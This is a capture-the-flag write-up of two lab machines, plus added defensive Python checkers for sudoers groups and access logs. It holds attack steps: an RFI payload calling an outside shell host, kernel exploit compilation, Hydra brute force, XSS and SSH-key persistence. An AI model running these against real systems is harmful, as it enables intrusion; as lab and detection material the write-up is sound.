Hacker’s Dome – First Blood | The Official Writeup

May 27, 2014

I’ll try to keep this information to a minimum for better readability. The setup was replicated over a local network for faster access.

ctf01-01, IP address: 10.200.0.4

Enumeration:

nmap -sS -p 1-65535 10.200.0.4

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 13:06 EEST
Nmap scan report for 10.200.0.4
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:89:35:6E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 6.67 seconds

nmap -sU 10.200.0.4

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 13:06 EEST
Nmap scan report for 10.200.0.4
Host is up (0.00044s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:89:35:6E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1092.14 seconds

The web server running on 80/tcp doesn’t give up any information from the index, but a web scanner doesn’t hurt.

nikto -host 10.200.0.4 -C all
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.200.0.4
+ Target Hostname: 10.200.0.4
+ Target Port: 80
+ Start Time: 2014-05-23 13:08:41 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Server leaks inodes via ETags, header found with file /, inode: 2130490, size: 179, mtime: Wed Mar 3 04:53:52 2027
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Cookie openscrutin created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.1.6
+ OSVDB-3092: /development/: This might be interesting…
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 22353 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2014-05-23 13:09:45 (GMT3) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There are a couple of interesting items: the /info.php script and the /development/ directory.

The info.php script simply calls phpinfo(). This is a fairly common mistake made by PHP developers: a script like this is left on the production server as a convenient way to check the configuration. Unfortunately, "baddies" may also discover these poorly thought-out decisions.

The juicy bits from phpinfo() are:

PHP 5.1.6 and allow_url_fopen = On

allow_url_fopen is On in PHP's default configuration and, prior to PHP 5.2.0, it also governs include and require, so a URL passed to an include statement fetches and executes remote PHP code. PHP 5.2.0 split this out into a separate allow_url_include option, which is disabled by default precisely to mitigate remote file inclusion attacks.

register_globals = On

This is a common “misconfiguration” made by developers who are too lazy to get stuff out of superglobals, such as $_GET and $_POST. Therefore, when the register_globals configuration option is turned on, $_GET['foo'] is registered as a global $foo. When combining this “misconfiguration” with allow_url_fopen and sloppy coding full of include statements that use uninitialized variables, the result is a guaranteed recipe for disaster.

The application from /development/ is the perfect example of the recipe mentioned above: Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability.

The first RFI example is http://shell4u.tk/[path]/obj/droit.class.php?path_om=[Shell]

Putting that into practice:

[Screenshot: ctf01-01-pwn]

I’d like to point out that the machine is running a 32-bit build. As pointed out by some of our contestants, some of you attempted to hit it with 64-bit local root exploits. That’s a big no-no. uname -a on the target machine and gcc’s -m32 flag on your machine are your friends.

The 2.6.18-8.el5 kernel is vulnerable to the venerable Sendpage Local Privilege Escalation, also known as CVE-2009-2692. I used this exploit because, in my experience, it works well on most targets.

gcc -m32 9545.c -o sock_sendpage
file sock_sendpage
sock_sendpage: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xa7e09b5a2c75ae82884ab06a9f378491eb6221a7, not stripped

ctf01-02 – the First Blood edition, IP address: 10.200.0.6

As previously mentioned, this machine was watered down due to technical issues. Although it took us longer to deploy, you got two machines as we promised.

I’ll start with the “easy way in”. I added a user that is also used for HTTP Basic Authentication on this machine, simulating a common mistake: credential reuse.

root@ctf01-02:~# adduser admin
Adding user `admin' ...
Adding new group `admin' (1001) ...
Adding new user `admin' (1001) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
root@ctf01-02:~#

This part also includes a hidden flaw that is due to a default Ubuntu policy, which some people are unaware of. If you add a user named admin, adduser also creates a group named admin for it, and the default sudoers policy lets members of that group run anything as root, even though nothing in the dialogue above hints at it.

The issue is the default sudoers policy:

root@ctf01-02:~# cat /etc/sudoers | grep ALL
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo ALL=(ALL:ALL) ALL

This shows that there are two "supergroups" there: sudo and admin. However, before the adduser command was run, there wasn't any admin group; only the sudo group existed.
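Added example, not from the original post: a small Python checker that reproduces sudo's group matching against constructed /etc/sudoers, /etc/passwd and /etc/group snapshots taken before and after `adduser admin`, to show why the new user silently gains root even though the admin group lists no members. The file contents are constructed for this example; the sudoers rule grammar handled is only the simple `who host=(runas) cmd` form quoted above.

```python
import re

# Constructed snapshots modelled on the default Ubuntu policy quoted in the write-up
SUDOERS = """\
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
"""
PASSWD_BEFORE = "root:x:0:0:root:/root:/bin/bash\nubuntu:x:1000:1000::/home/ubuntu:/bin/bash\n"
PASSWD_AFTER = PASSWD_BEFORE + "admin:x:1001:1001::/home/admin:/bin/bash\n"
GROUP_BEFORE = "root:x:0:\nsudo:x:27:ubuntu\nubuntu:x:1000:\n"
# adduser created group 1001; its members field stays empty because admin belongs to it
# through the primary GID in /etc/passwd, which is exactly what makes this easy to miss
GROUP_AFTER = GROUP_BEFORE + "admin:x:1001:\n"

SUDO_RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s+(?P<cmd>.+)$")

def parse_sudoers(text):
    """Return (who, runas, cmd) for each user/group rule; a leading % marks a group."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line.split("#", 1)[0].strip())
        if m:
            rules.append((m["who"], m["runas"], m["cmd"].strip()))
    return rules

def groups_of(user, passwd_text, group_text):
    """Primary group (via the passwd GID) plus supplementary groups, as sudo resolves them."""
    gid_to_name, groups = {}, set()
    for line in group_text.splitlines():
        name, _, gid, members = line.split(":")
        gid_to_name[gid] = name
        if user in members.split(","):
            groups.add(name)
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if fields[0] == user:
            groups.add(gid_to_name.get(fields[3], fields[3]))
    return groups

def root_grants(user, sudoers, passwd_text, group_text):
    """Names of sudoers rules giving `user` unrestricted root (command ALL, run as ALL/root)."""
    groups = groups_of(user, passwd_text, group_text)
    hits = []
    for who, runas, cmd in parse_sudoers(sudoers):
        applies = who == user or (who.startswith("%") and who[1:] in groups)
        if applies and cmd == "ALL" and runas.split(":")[0] in ("ALL", "root"):
            hits.append(who)
    return hits
```

Running `root_grants("admin", SUDOERS, PASSWD_AFTER, GROUP_AFTER)` returns `['%admin']`, while the same call against the "before" snapshots returns nothing; the real-world check is `sudo -l -U admin` on the box, which walks the same group logic.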

Enumeration:

nmap -sS -p 1-65535 10.200.0.6

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 14:31 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:4B:D2:34 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 7.32 seconds

nmap -sU 10.200.0.6

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 14:31 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00065s latency).
Not shown: 949 closed ports, 50 open|filtered ports
PORT STATE SERVICE
5353/udp open zeroconf
MAC Address: 08:00:27:4B:D2:34 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1022.47 seconds

However, 80/tcp is behind HTTP Basic Authentication:

curl -I 10.200.0.6
HTTP/1.1 401 Authorization Required
Date: Fri, 23 May 2014 11:32:27 GMT
Server: Apache/2.2.22 (Ubuntu)
WWW-Authenticate: Basic realm="Private party; admin area"
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1

The WWW-Authenticate: Basic realm header indicates what a good guess for the username would be. Anyway, “admin” is definitely a Top 20 username, hence an easy guess with a basic brute force attack.

cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/
ls
unix_passwords.txt unix_users.txt
hydra -L unix_users.txt -P unix_passwords.txt http://10.200.0.6/
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-23 14:43:24
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[DATA] 16 tasks, 1 server, 108000 login tries (l:108/p:1000), ~6750 tries per task
[DATA] attacking service http-get on port 80
[80][www] host: 10.200.0.6 login: admin password: qwerty

The brute force succeeds fairly quickly. Since SSH is open, it’s worth trying the same credentials:

[Screenshot: ctf01-02-fb-pwn]
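As an added defensive example (not part of the original write-up), the following Python checks an Apache access log for the attacker behaviour shown on both machines: query parameters carrying a remote URL or stream wrapper (the Openscrutin path_om RFI on ctf01-01), hits on the phpinfo() script, and a burst of HTTP 401 responses from one source followed by a successful authenticated request, which is what a Hydra run against Basic Auth leaves behind on ctf01-02. The log lines are constructed and the regex assumes Apache's combined log format.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined log: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) ')
# A query value starting with one of these is the classic RFI / stream-wrapper tell
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")

# Constructed sample lines modelled on the traffic the two machines would have seen
SAMPLE_LOG = """\
10.200.0.99 - - [23/May/2014:13:08:41 +0300] "GET /info.php HTTP/1.1" 200 48213 "-" "Nikto"
10.200.0.99 - - [23/May/2014:13:12:02 +0300] "GET /development/obj/droit.class.php?path_om=http://shell4u.tk/x.txt? HTTP/1.1" 200 512 "-" "curl"
10.200.0.99 - - [23/May/2014:14:43:24 +0300] "GET / HTTP/1.1" 401 483 "-" "Hydra"
10.200.0.99 - - [23/May/2014:14:43:24 +0300] "GET / HTTP/1.1" 401 483 "-" "Hydra"
10.200.0.99 - - [23/May/2014:14:43:25 +0300] "GET / HTTP/1.1" 401 483 "-" "Hydra"
10.200.0.99 - admin [23/May/2014:14:43:26 +0300] "GET / HTTP/1.1" 200 1203 "-" "Hydra"
"""

def rfi_params(url):
    """(name, value) query pairs whose value points at a remote or stream resource."""
    return [(n, v) for n, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]

def analyze(log_text, auth_threshold=3):
    """Return (kind, ip, detail) findings: RFI attempts, phpinfo hits, auth brute force."""
    findings, failed, guessed = [], Counter(), {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        path = urlsplit(rec["url"]).path
        for name, value in rfi_params(rec["url"]):
            findings.append(("rfi", rec["ip"], f"{path}?{name}={value}"))
        if path.endswith(("/info.php", "/phpinfo.php")):
            findings.append(("phpinfo", rec["ip"], path))
        if rec["status"] == "401":
            failed[rec["ip"]] += 1
        elif failed[rec["ip"]] and rec["user"] != "-":
            guessed[rec["ip"]] = rec["user"]  # success after failures: a credential was found
    for ip, n in failed.items():
        if n >= auth_threshold:
            user = guessed.get(ip)
            detail = f"{n} x 401" + (f", then success as '{user}'" if user else "")
            findings.append(("auth-bruteforce", ip, detail))
    return findings
```

`analyze(SAMPLE_LOG)` returns three findings for the sample: the phpinfo hit, the RFI attempt with its offending parameter, and the 401 burst that ended in a login as admin.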

ctf01-02 – the original edition, IP address: 10.200.0.6

This is the write-up for the original machine that didn’t take part in the competition. This is what you get in the pristine image that was made available for download. The intention was to make this the “intermediate” level image, but it happened to be the easy one.

I discovered that I couldn’t replicate the attack by using an isolated network without Internet access. If the client-side exploit fails, try to provide Internet access to the machine. We tried to provide Internet access to the machine on the Hacker’s Dome network, but I was still unable to get a reliable exploit.

At this point, I skipped to the point where the HTTP Basic Authentication is bypassed with admin/qwerty. There’s a web application running there which states: “Hi people. Post a message while I’m AFK. Say what you need. I’ll check periodically to see if there’s something new.”

It proves to be vulnerable to XSS:

[Screenshot: ctf01-02-orig-xss]

The next step is to verify if another client is accessing this resource. So, while monitoring Apache's access log, I injected an iframe <iframe src="http://10.0.0.4/">:

[Screenshot: ctf01-02-orig-iframe]

So there's some information about the user agent of the admin who checks his messages: Firefox/17.0. A little research turns up this page: Firefox 17.0.1 Flash Privileged Code Injection.

Putting that into practice:

[Screenshot: ctf01-02-orig-firefox-pwn]

The connection is unstable since the remote user agent is restarted often, so the access needs to be made persistent quickly. Since the SSH port is open and a daemon is running there, the fastest option is to add your SSH public key to ~/.ssh/authorized_keys.

pwd
/home/xubuntu
mkdir .ssh
echo "ssh-rsa [the rest of the public key]" > .ssh/authorized_keys
cat .ssh/authorized_keys
ssh-rsa [the rest of the public key]
chmod 600 .ssh/authorized_keys

The installed kernel proves to be vulnerable to the quite fresh CVE-2014-0038. This public exploit proves to be the fastest, even though it requires editing some addresses to make it work under this kernel.

The addresses for Ubuntu 12.04 running 3.8.0-29-generic are:

PTMX_FOPS 0xffffffff81f16f20LL
TTY_RELEASE 0xffffffff81420c30LL
COMMIT_CREDS 0xffffffff81086780LL
PREPARE_KERNEL_CRED 0xffffffff81086a00LL

timeoutpwn.c needs to be updated with these addresses and uploaded to the victim machine since there’s a gcc installation there.

[Screenshot: ctf01-02-orig-exploit]

Then, there’s a clear path to root:

[Screenshot: ctf01-02-orig-pwn]
